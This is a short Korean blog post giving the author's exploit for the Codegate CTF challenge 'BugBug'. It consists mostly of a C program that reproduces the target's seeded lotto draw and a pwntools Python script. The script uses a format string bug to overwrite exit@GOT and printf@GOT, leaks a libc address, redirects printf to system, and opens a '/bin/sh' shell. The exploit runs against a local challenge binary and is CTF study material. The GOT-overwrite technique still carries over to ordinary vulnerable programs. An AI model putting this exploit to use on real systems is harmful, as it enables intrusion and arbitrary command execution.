[Codegate] BugBug
MyriaBreak
2018. 8. 22. 18:11
풀다가 정체불명의 오류 때문에 한참 화가 났다... 결국 원인은 알아내지 못하고, 코드를 갈아엎고 처음부터 다시 짜게 되었다.
귀찮아서 자세한 설명은 적지 않겠다.
그냥 익스코드만 올려놓는다. 흐름만 요약하면: 포맷 스트링 버그로 exit@GOT의 하위 2바이트를 main 주소로 덮어 프로그램이 종료 대신 main으로 되돌아가게 하고, 출력에서 srand() 시드와 스택에 남아 있는 libc 주소를 읽어낸다. 시드는 아래 C 코드(./rand, 대상의 로또 번호 생성 로직을 옮긴 것으로 보인다)에 넣어 번호를 재현하고, 두 번째 입력에서 printf@GOT를 system으로 덮어 "/bin/sh;"를 실행시킨다. libc 오프셋(0x1fda74, 0x3ada0)은 문제 환경의 libc 기준이므로 다른 libc에서는 다시 구해야 한다.
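#include <stdio.h>
#include <stdlib.h>

/*
 * Re-implementation of the target's lotto-number generator (built as ./rand).
 *
 * The target seeds rand() with a value the exploit leaks from the process; this
 * program takes that seed as argv[1] and prints the six numbers the target will
 * draw for it. (The original source read the seed from /dev/urandom instead,
 * which is presumably how the target itself seeds -- confirm against the binary.)
 */

#define LOTTO_COUNT 6
#define LOTTO_RANGE 45

/*
 * Fill out[0..LOTTO_COUNT-1] with the draw for the given seed.
 *
 * The duplicate check intentionally keeps the target's quirk: after a collision
 * j is reset to 0, and the loop's own j++ then makes the recheck start at
 * out[1], so a repeat of out[0] can slip through. Do NOT "fix" this -- the
 * exploit only works if this output matches the target draw for draw (assumes
 * the target uses the same loop; verify against the binary).
 */
static void generate_lotto(unsigned int seed, int out[LOTTO_COUNT])
{
    int i, j;
    int next_random;

    srand(seed);
    for (i = 0; i < LOTTO_COUNT; i++) {
        next_random = rand() % LOTTO_RANGE + 1;
        for (j = 0; j < i; j++) {
            if (out[j] == next_random) {
                next_random = rand() % LOTTO_RANGE + 1;
                j = 0;
            }
        }
        out[i] = next_random;
    }
}

/*
 * Usage: ./rand <seed>
 *
 * Prints the draw as "n n n n n n \n". The trailing space and newline are
 * forwarded verbatim to the target by the Python exploit, so keep the format.
 */
int main(int argc, char *argv[])
{
    unsigned int seed;
    int random[LOTTO_COUNT];
    char *end;
    int i;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <seed>\n", argv[0]);
        return 1;
    }

    /*
     * strtoul rather than atoi: the leaked seed is a full 32-bit value and is
     * frequently above INT_MAX. atoi() only promises int range (and saturates
     * where long is 32 bits), which would silently produce a different draw.
     */
    seed = (unsigned int)strtoul(argv[1], &end, 10);
    if (argv[1][0] == '\0' || *end != '\0') {
        fprintf(stderr, "%s: seed must be a decimal integer\n", argv[0]);
        return 1;
    }

    generate_lotto(seed, random);
    for (i = 0; i < LOTTO_COUNT; i++)
        printf("%d ", random[i]);
    printf("\n");
    return 0;
}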
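from pwn import *
from subprocess import check_output

# Addresses inside the (non-PIE) BugBug binary.
exit_got = 0x804A024
printf_got = 0x804A010
main_addr = 0x804882E

# libc-specific constants: the distance from the value leaked with %4$x to
# the libc base, and system()'s offset from that base. Both belong to the
# libc the challenge shipped with and must be re-derived for any other build.
LEAK_TO_BASE = 0x1fda74
SYSTEM_OFFSET = 0x3ada0

# Every line sent to the target is padded to this length so the stack layout
# behind the positional %N$ specifiers is the same on every run (the target
# presumably reads a fixed 100-byte buffer -- confirm against the binary).
INPUT_SIZE = 100


def get_lottonum(seed):
    """Run ./rand with the leaked seed and return its stdout (trailing newline kept).

    ./rand re-implements the target's rand()-based lotto generator, so for a
    known srand() seed it prints the six numbers the target will accept.
    """
    # argv list, no shell: the seed comes from the target process, so it never
    # passes through a shell string even though u32() guarantees an int here.
    return check_output(["./rand", str(seed)])


def fmt_write16(value, argpos, written=0):
    """Build ``%<pad>x%<argpos>$hn`` so printf's byte count reaches ``value``
    (mod 0x10000) and is stored as a 16-bit short through the pointer at stack
    argument ``argpos``.

    ``written`` is the count already produced by preceding specifiers. The pad
    wraps modulo 0x10000, so the write is still right when ``value`` is smaller
    than what was already printed (the hand-computed ``high - low`` this
    replaces could go negative depending on the ASLR base, turning the
    specifier into ``%-N...x`` and breaking the count). A pad below 8 is bumped
    by 0x10000: %x prints at least the argument's own hex digits (up to 8 on
    x86), which would otherwise overshoot, and %hn only keeps the low 16 bits.
    """
    pad = (value - written) % 0x10000
    if pad < 8:
        pad += 0x10000
    return b"%" + str(pad).encode() + b"x%" + str(argpos).encode() + b"$hn"


def main():
    conn = process("./BugBug")

    # Stage 1: one %hn write replaces the low half of exit@GOT with main's, so
    # exit() re-enters main instead of leaving (only the low half is written;
    # the upper 0x0804 is assumed to already be there). "BASE%4$x" tags a
    # leaked stack word for later. exit_got is placed at byte 16 of the line
    # so it is stack argument 21 (positions found by inspecting the target).
    payload = fmt_write16(main_addr & 0xFFFF, 21).ljust(16, b"A")
    payload += p32(exit_got)
    payload += b"BASE%4$x"
    payload = payload.ljust(INPUT_SIZE, b"B")
    conn.recvuntil(b"Who are you?")
    conn.sendline(payload)

    # After the greeting come 100 bytes (presumably our echoed name) and then
    # the 4-byte srand() seed. recvn(), not recv(): recv(100) may return fewer
    # bytes and silently shift where the seed is read from.
    conn.recvuntil(b"Hello~ ")
    conn.recvn(INPUT_SIZE)
    seed = u32(conn.recvn(4))
    lotto_num = get_lottonum(seed)
    log.info(lotto_num)
    conn.recvuntil(b"==> ")
    conn.sendline(lotto_num)

    # libc base from the tagged leak. %x emits lowercase hex, so the uppercase
    # "BB" padding unambiguously terminates the leaked value.
    conn.recvuntil(b"BASE")
    leaked = int(conn.recvuntil(b"BB")[:-2], 16)
    base_addr = leaked - LEAK_TO_BASE
    log.info("base_addr : 0x%x" % base_addr)
    system_addr = base_addr + SYSTEM_OFFSET

    # Stage 2: printf@GOT -> system as two 16-bit writes (arg 26 -> low half
    # at printf_got, arg 27 -> high half at printf_got+2); the second pad
    # accounts for what the first specifier already printed.
    low_half = system_addr & 0xFFFF
    high_half = system_addr >> 16
    log.info("distance : %d" % ((high_half - low_half) % 0x10000))
    payload = fmt_write16(low_half, 26)
    payload += fmt_write16(high_half, 27, written=low_half)
    payload = payload.ljust(32, b"A")
    payload += p32(printf_got)
    payload += p32(printf_got + 2)
    payload = payload.ljust(INPUT_SIZE, b"B")
    conn.sendline(payload)
    conn.sendline(lotto_num)

    # From here on the target's printf(buf) is system(buf), so the next line
    # it echoes is run as a command. The trailing ';' is presumably there to
    # keep anything the target appends out of the command -- check its printf.
    conn.sendline(b"/bin/sh;")
    conn.recvuntil(b"Input your answer@_@")
    conn.sendline(lotto_num)
    conn.interactive()


if __name__ == "__main__":
    main()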